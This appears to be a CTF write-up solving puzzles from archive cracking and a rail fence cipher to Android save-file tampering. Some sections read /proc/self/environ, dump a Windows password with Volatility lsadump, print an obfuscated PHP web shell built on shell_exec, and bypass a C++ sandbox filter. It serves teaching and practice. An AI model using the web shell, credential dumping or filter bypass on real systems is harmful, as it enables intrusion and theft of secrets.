decompress

Nested archives (a matryoshka): keep solving until the last layer, then extract the file.

The hint gives a regular expression; brute-force the password according to it. There are five characters in total, and the fourth is a digit.

^([a-z]){3}\d[a-z]$ matches five characters in total. Brute-force it directly with ARCHPR to get the password xtr4m, then decompress to get the flag.

pleasingMusic

The title description mentions:

A song can sound good both forwards and backwards. Following the hint (you can in fact also hear that the second half of the music is played backwards), reverse the audio and then decode the Morse code.

The Morse code can be translated by hand from a table, or decoded with an online tool.

Thick marks represent -, thin marks represent ., and gaps are written as a space or / to separate the groups.

WhereIsFlag

Search manually with plain shell commands to find the real flag. It is in the /proc/self/environ file (which can be used to obtain the environment variables of the current process); you can get the flag by executing the following command.

cat /proc/self/environ

Labyrinth

Redeem code

wireshark_checkin

wireshark_secret

Going by the challenge description, find the Teyvat script comparison table.

The comparison table explains a lot.

I tried the big string in the middle at the beginning, but the upper and lower case were not correct.

Then continue to decrypt the small ciphertexts around it to get: FLAGISASENTENCE IIAAELGTSFKFA DOYOUKNOWFENCE MESIOAABGNHNSGOGMYEIADE

The hint is that the flag is a sentence, and FENCE points to rail fence encryption of MESIOAABGNHNSGOGMYEIADE.

https://ctf.bugku.com/tool/railfence

Wrapping the result in flag{} as-is is rejected on submission; it is accepted after switching to lowercase.

The final flag is: flag{maybegenshinisagoodgame}
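The rail fence step above can be reproduced offline. This is an added example, not part of the original writeup; the function names are hypothetical, and the rail count is not stated on the page, so the code lists the decryption for each small rail count and the analyst picks the readable one (3 rails in the zigzag variant).

```python
def rail_pattern(length, rails):
    """Rail index visited by each plaintext position in a zigzag (W-shaped) fence."""
    if rails < 2:
        return [0] * length
    cycle = list(range(rails)) + list(range(rails - 2, 0, -1))
    return [cycle[i % len(cycle)] for i in range(length)]


def rail_fence_encrypt(plain, rails):
    pattern = rail_pattern(len(plain), rails)
    return ''.join(ch for r in range(rails)
                   for ch, p in zip(plain, pattern) if p == r)


def rail_fence_decrypt(cipher, rails):
    pattern = rail_pattern(len(cipher), rails)
    # The ciphertext is rail 0 read left to right, then rail 1, and so on, so a
    # stable sort of the positions by rail gives the slot of each cipher letter.
    order = sorted(range(len(cipher)), key=lambda i: pattern[i])
    plain = [''] * len(cipher)
    for ch, pos in zip(cipher, order):
        plain[pos] = ch
    return ''.join(plain)


def candidates(cipher, max_rails=None):
    """Decrypt with every rail count from 2 up to max_rails."""
    max_rails = max_rails or len(cipher) - 1
    return {r: rail_fence_decrypt(cipher, r) for r in range(2, max_rails + 1)}


CIPHERTEXT = 'MESIOAABGNHNSGOGMYEIADE'  # ciphertext quoted in the writeup

if __name__ == '__main__':
    for rails, text in candidates(CIPHERTEXT, 6).items():
        print(rails, text)
```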

The Secret between the Lines

Open it with VS Code and you will find zero-width characters, U+202C.

Get the password: it_is_k3y

Open the Word document with the password. It appears blank; select all with Ctrl+A and copy the content out to get the flag.

Xiao Ming, who is enthusiastic and helpful

vol.py -f image.raw imageinfo

It can be seen that the suggested profiles are: Win7SP1x86_23418, Win7SP0x86, Win7SP1x86_24000, Win7SP1x86. Here we pick the first one (Win7SP1x86_23418) to try; if it doesn't work, try another.

vol.py -f image.raw --profile=Win7SP1x86_23418 lsadump

The leading 0x48 is not part of the password; you can think of it as a marker. Apart from that, you get the system password: ZDFyVDlfdTNlUl9wNHNTdzByRF9IQUNLRVIh.

The final flag is flag{ZDFyVDlfdTNlUl9wNHNTdzByRF9IQUNLRVIh}

With the typhoon of Volt using the tracer

Step 1, open the link to the news video.

Based on the video, we get the following information:

Required report: The Rise of Dark Power
Corresponding version: the original April 15th version
Status: the required information has been tampered with

We search directly for the report name:

https://threatmon.io/storage/the-rise-of-dark-power-a-close-look-at-the-group-and-their-ransomware.pdf

You can see the PDF file we need, but the video also mentioned that the report content has been tampered with.

So the current version definitely does not have the information we need.

The challenge author was lucky earlier and found an original-version PDF that could be downloaded directly, so could get started right away.

But what if you are not so lucky? Then we turn to the Wayback Machine.

Enter the official website link and start tracing back; a snapshot from April 15th happens to be available.

Download the file; the remaining steps are the same as those demonstrated in the video.

Remove the cover image at the back, take the content of the Domain box, and compute its MD5.

Of course, if you can read the blurred information in the video directly with the naked eye, the challenge author will accept that too.

Wrap it in the flag format to get flag{6c3ea51b6f9d4f5e}.

Herta's Study

Export the HTTP objects to get upload.php.

```php
<?php
$payload=$_GET['payload'];
$payload=shell_exec($payload);
$bbb=create_function(
    base64_decode('J'.str_rot13('T').'5z'),
    base64_decode('JG5zPWJhc2U2NF9lbmNvZGUoJG5zKTsNCmZvcigkaT0wOyRpPHN0cmxlbigkbnMpOyRp
Kz0xKXsNCiAgICBpZigkaSUy'.str_rot13('CG0kXKfAPvNtVPNtVPNtWT5mJlEcKG1m').'dHJfcm90MTMoJG5zWyRpXSk7DQo
gICAgfQ0KfQ0KcmV0dXJuICRuczs==')
);
echo $bbb($payload);
?>
```

The str_rot13() function performs ROT13 encoding on a string.

ROT13 encoding shifts each letter 13 places in the alphabet. Digits and non-alphabetic characters remain the same.

'.' is the concatenation operator in PHP, so the uploaded PHP code is actually:

```php
<?php
$payload=$_GET['payload'];
$payload=shell_exec($payload);
$bbb=function ($ns) {
    $ns=base64_encode($ns);
    // ROT13 every character at an odd index of the base64 text
    for ($i=0; $i<strlen($ns); $i++) {
        if ($i % 2==1) {
            $ns[$i]=str_rot13($ns[$i]);
        }
    }
    return $ns;
};
echo $bbb($payload);
?>
```

According to the code, the command output is base64-encoded, and then the characters at odd indexes are encoded with str_rot13.

Then find the packet that requests the flag and decode it, but it turns out to be a fake flag.

```php
<?php
$result='ZzxuZ3tmSQNsaGRsUmBsNzVOdKQkZaVZLa0tCt==';
$bbb=function ($ns) {
    // ROT13 is its own inverse: apply it again to the odd indexes
    for ($i=0; $i<strlen($ns); $i++) {
        if ($i % 2==1) {
            $ns[$i]=str_rot13($ns[$i]);
        }
    }
    return $ns;
};
// What remains is plain base64
echo base64_decode($bbb($result));
?>
```

Later, I went to find f.txt and solved the flag: flag{sH3_i4_S0_6eAut1fuL.}

Is BGM broken?

When you open the audio with Audacity, it is easy to see that there is information at the end of the right channel, while the left channel is noise.

According to the challenge description, it is a dial tone, but it cannot be used directly, so the noise needs to be removed.

Select Split Stereo to Mono » turn off the left channel » Export.

Decode the key tones on a decoding website (i.e. a DTMF decoder).

Then just wrap the result in flag{}.

AmazingGame

An app's private directory on Android is located at /data/user/0/<package name>.

Android shared_prefs is generally used to store an app's configuration data.

Modify the file to change the data on which levels have been passed.

After passing the first level, close the game (this is very important).

Connect to the phone with ADB and run:

```shell
adb shell
run-as com.pangbai.projectm
cd shared_prefs
cat net.osaris.turbofly.JumpyBall.xml
```

```xml
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <boolean name='cockpitView' value='true' />
    <int name='unlockedsolotracks' value='2' />
    <int name='unlockedtracks' value='2' />
    <int name='best0m0' value='130' />
    <int name='unlockedships' value='1' />
    <int name='userid' value='9705893' />
</map>
```

The game has 23 levels, so we change the number of unlocked levels to 23.

Normally, adb push should be used to modify the file. Here, for convenience, we directly replace 2 with 23.

```shell
sed -i 's/2/23/g' net.osaris.turbofly.JumpyBall.xml
```

Open the game and you will find that all levels are unlocked. Play any of the 23 levels; you get the flag when the game is over.

ez_jail

The original intent of this challenge was to test only knowledge of the (macro) substitution operator in C++.

As long as you search with the right keywords you can find it online, but the challenge author's execution was flawed, and many unintended solutions turned up during testing. After considering the difficulty of each knowledge point, I felt that the unintended solutions were not much different in difficulty from the intended one, so it simply became a semi-open challenge.

Let's look at the check function in the code:

```python
def cpp_code_checker(code):
    # Plain substring checks on the submitted source
    if '#include' in code:
        return False, 'Code is not allowed to include libraries'
    if '#define' in code:
        return False, 'Code is not allowed to use macros'
    if '{' in code or '}' in code:
        return (
            False,
            'Code is not allowed to use `{` or `}`,but it needs to be a single function',
        )
    if len(code) > 100:
        return False, 'Code is too long'
    return True, 'Code is valid'
```

This code seems to filter #include, #define and so on, but I don't know whether the students realized that adding spaces after # bypasses it, which means macro definitions can still be handled by the preprocessor.

So the payload can look like this (thanks to Master Yuro for providing the solution):

```cpp
# define user_code() write(STDOUT_FILENO, "Hello, World!", 13);
```
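Seen from the checker's side, the substring test fails because it matches spellings rather than what the preprocessor will see. The following added example (not the challenge's own code; `weak_checker`, `normalize`, `hardened_checker` and the sample inputs are constructed here) puts a reduced copy of the page's filter beside a stricter one that normalizes alternative spellings first and then rejects every directive.

```python
import re

def weak_checker(code):
    """The writeup's substring filter, reduced to the checks that matter here."""
    if '#include' in code or '#define' in code:
        return False
    return '{' not in code and '}' not in code

# Other spellings a C++ compiler may accept for '#', '{' and '}' (trigraphs, digraphs).
# Replacing them everywhere over-rejects some harmless code, which is fine for a jail.
ALT_TOKENS = {'??=': '#', '??<': '{', '??>': '}', '%:': '#', '<%': '{', '%>': '}'}

def normalize(code):
    """Approximate the early translation phases before matching anything."""
    for alt, plain in ALT_TOKENS.items():
        code = code.replace(alt, plain)
    code = re.sub(r'\\\r?\n', '', code)                  # splice backslash-newline
    return re.sub(r'/\*.*?\*/', ' ', code, flags=re.S)   # a comment counts as a space

DIRECTIVE = re.compile(r'^\s*#', re.M)   # any directive, whatever follows the '#'

def hardened_checker(code):
    if len(code) > 100:
        return False, 'Code is too long'
    norm = normalize(code)
    if DIRECTIVE.search(norm):
        return False, 'Preprocessor directives are not allowed'
    if '{' in norm or '}' in norm:
        return False, 'Code is not allowed to use `{` or `}`'
    return True, 'Code is valid'

# Constructed regression inputs: the page's payload shape plus alternative spellings.
SAMPLES = [
    '# define user_code() write(STDOUT_FILENO, "Hello, World!", 13);',
    '%: define user_code() puts("hi");',
    '#def\\\nine user_code() puts("hi");',
    'void user_code() <% puts("hi"); %>',
    'int user_code();',
]

if __name__ == '__main__':
    for s in SAMPLES:
        print(weak_checker(s), hardened_checker(s)[0], repr(s))
```

Even the stricter filter is still a denylist over source text; compiling and running submissions inside a sandbox with no secrets in reach is the control that does not depend on enumerating spellings.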
